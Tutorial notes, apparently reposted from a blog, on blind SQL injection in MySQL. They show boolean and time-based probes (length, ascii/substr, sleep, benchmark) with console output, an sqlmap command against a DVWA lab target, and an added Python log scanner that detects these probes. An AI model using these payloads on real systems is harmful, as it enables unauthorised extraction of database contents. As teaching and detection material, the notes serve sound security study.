SQL blind injection - notes

    Blind injection arises when the result of the database query is not displayed directly on the page. Information can only be inferred by crafting query conditions and observing whether the page's response corresponds to a true or a false result.

    The actual injection technique differs little from injection with visible output.
    Only the general approach is recorded below.
     
    select length('test'); -- returns the length of a string
    Use binary search to determine the length of the database name:
    mysql> select length(database())>10;
    +-----------------------+
    | length(database())>10 |
    +-----------------------+
    |                     0 |
    +-----------------------+
    1 row in set (0.00 sec)
     
    mysql> select length(database())>5;
    +----------------------+
    | length(database())>5 |
    +----------------------+
    |                    0 |
    +----------------------+
    1 row in set (0.00 sec)
     
    mysql> select length(database())>3;
    +----------------------+
    | length(database())>3 |
    +----------------------+
    |                    1 |
    +----------------------+
    1 row in set (0.00 sec)
     
    mysql> select length(database())=4;
    +----------------------+
    | length(database())=4 |
    +----------------------+
    |                    1 |
    +----------------------+
    1 row in set (0.00 sec)
     
    mysql> select substr(database(),1,1);
    +------------------------+
    | substr(database(),1,1) |
    +------------------------+
    | d                      |
    +------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>64;
    +----------------------------------+
    | ascii(substr(database(),1,1))>64 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>100;
    +-----------------------------------+
    | ascii(substr(database(),1,1))>100 |
    +-----------------------------------+
    |                                 0 |
    +-----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>80;
    +----------------------------------+
    | ascii(substr(database(),1,1))>80 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>90;
    +----------------------------------+
    | ascii(substr(database(),1,1))>90 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>95;
    +----------------------------------+
    | ascii(substr(database(),1,1))>95 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>97;
    +----------------------------------+
    | ascii(substr(database(),1,1))>97 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>98;
    +----------------------------------+
    | ascii(substr(database(),1,1))>98 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))>99;
    +----------------------------------+
    | ascii(substr(database(),1,1))>99 |
    +----------------------------------+
    |                                1 |
    +----------------------------------+
    1 row in set (0.00 sec)
     
    mysql> select ascii(substr(database(),1,1))=100;
    +-----------------------------------+
    | ascii(substr(database(),1,1))=100 |
    +-----------------------------------+
    |                                 1 |
    +-----------------------------------+
    1 row in set (0.00 sec)
     
    Using binary search, the ASCII code of the first character of the database name is determined to be 100, which corresponds to the lowercase letter d.
     
    Blind injection can also be done using time delays:
    mysql> select sleep(if(length(database())=4,3,0));
    +-------------------------------------+
    | sleep(if(length(database())=4,3,0)) |
    +-------------------------------------+
    |                                   0 |
    +-------------------------------------+
    1 row in set (3.00 sec)
     
    mysql> select sleep(if(length(database())=5,3,0));
    +-------------------------------------+
    | sleep(if(length(database())=5,3,0)) |
    +-------------------------------------+
    |                                   0 |
    +-------------------------------------+
    1 row in set (0.00 sec)
     
    Whether the guessed condition is correct is judged from the delay in the response.
     
    Delays can also be produced with benchmark, which executes a function repeatedly:
    mysql> select benchmark(50000,md5('test'));
    +------------------------------+
    | benchmark(50000,md5('test')) |
    +------------------------------+
    |                            0 |
    +------------------------------+
    1 row in set (0.02 sec)
     
    mysql> select benchmark(5000000,md5('test'));
    +--------------------------------+
    | benchmark(5000000,md5('test')) |
    +--------------------------------+
    |                              0 |
    +--------------------------------+
    1 row in set (1.45 sec)
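As an added, defender-side example that is not part of the original notes: a small Python scanner that flags the probe primitives shown above (length(database()), ascii(substr(...)), sleep(), benchmark()) in web access logs and correlates time-based probes with slow responses. The log format (combined log with response time in milliseconds as the last field) and the sample log lines are constructed for this example; adapt the LOG_LINE regex to your own access-log format.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures for the blind-injection primitives used in the notes above; matching is done on the URL-decoded query string.
PROBE_PATTERNS = {
    "boolean_length": re.compile(r"length\s*\(\s*database\s*\(\s*\)\s*\)\s*[=<>]", re.I),
    "boolean_ascii": re.compile(r"ascii\s*\(\s*substr(?:ing)?\s*\(", re.I),
    "time_sleep": re.compile(r"\bsleep\s*\(", re.I),
    "time_benchmark": re.compile(r"\bbenchmark\s*\(\s*\d+", re.I),
}
SLOW_MS = 2500  # a time-based probe whose response also took this long is a strong signal

# Assumed (constructed) log format: combined log with the response time in
# milliseconds appended as the last field.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ (?P<ms>\d+)$'
)

def classify_request(url, duration_ms):
    """Return the list of probe signatures that match one request."""
    decoded = unquote_plus(url)          # payloads arrive URL-encoded
    hits = [name for name, rx in PROBE_PATTERNS.items() if rx.search(decoded)]
    if duration_ms >= SLOW_MS and any(h.startswith("time_") for h in hits):
        hits.append("slow_response")     # the sleep()/benchmark() actually fired
    return hits

def scan_log(lines):
    """Map client IP -> Counter of signatures, for clients with at least one hit."""
    findings = {}
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        hits = classify_request(m["url"], int(m["ms"]))
        if hits:
            findings.setdefault(m["ip"], Counter()).update(hits)
    return findings

# Constructed sample traffic: the first three requests replay the probes from
# the notes above (URL-encoded); the last one is a normal request.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/May/2017:10:00:01 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=1+AND+length%28database%28%29%29%3E3 HTTP/1.1" 200 512 12',
    '198.51.100.7 - - [10/May/2017:10:00:02 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=1+AND+ascii%28substr%28database%28%29%2C1%2C1%29%29%3E100 HTTP/1.1" 200 512 11',
    '198.51.100.7 - - [10/May/2017:10:00:05 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=1+AND+sleep%28if%28length%28database%28%29%29%3D4%2C3%2C0%29%29 HTTP/1.1" 200 512 3004',
    '203.0.113.9 - - [10/May/2017:10:00:06 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=2 HTTP/1.1" 200 512 9',
]
```

Running scan_log(SAMPLE_LOG) attributes all probe hits to 198.51.100.7 and none to the normal client; a sequence of boolean probes from one source, or a time probe paired with a slow response, is what an alert rule should key on.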
     
     
    DVWA, high difficulty:
    python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli_blind/" -p "id" --cookie "PHPSESSID=dv9h9urfu9bf9udkd7ih6qdbj3;id=1;security=high" --level 2
    The injected parameter is carried in the cookie, so --level 2 has to be set.
     
     
     
Original post: https://www.cnblogs.com/enderzhou/p/6884537.html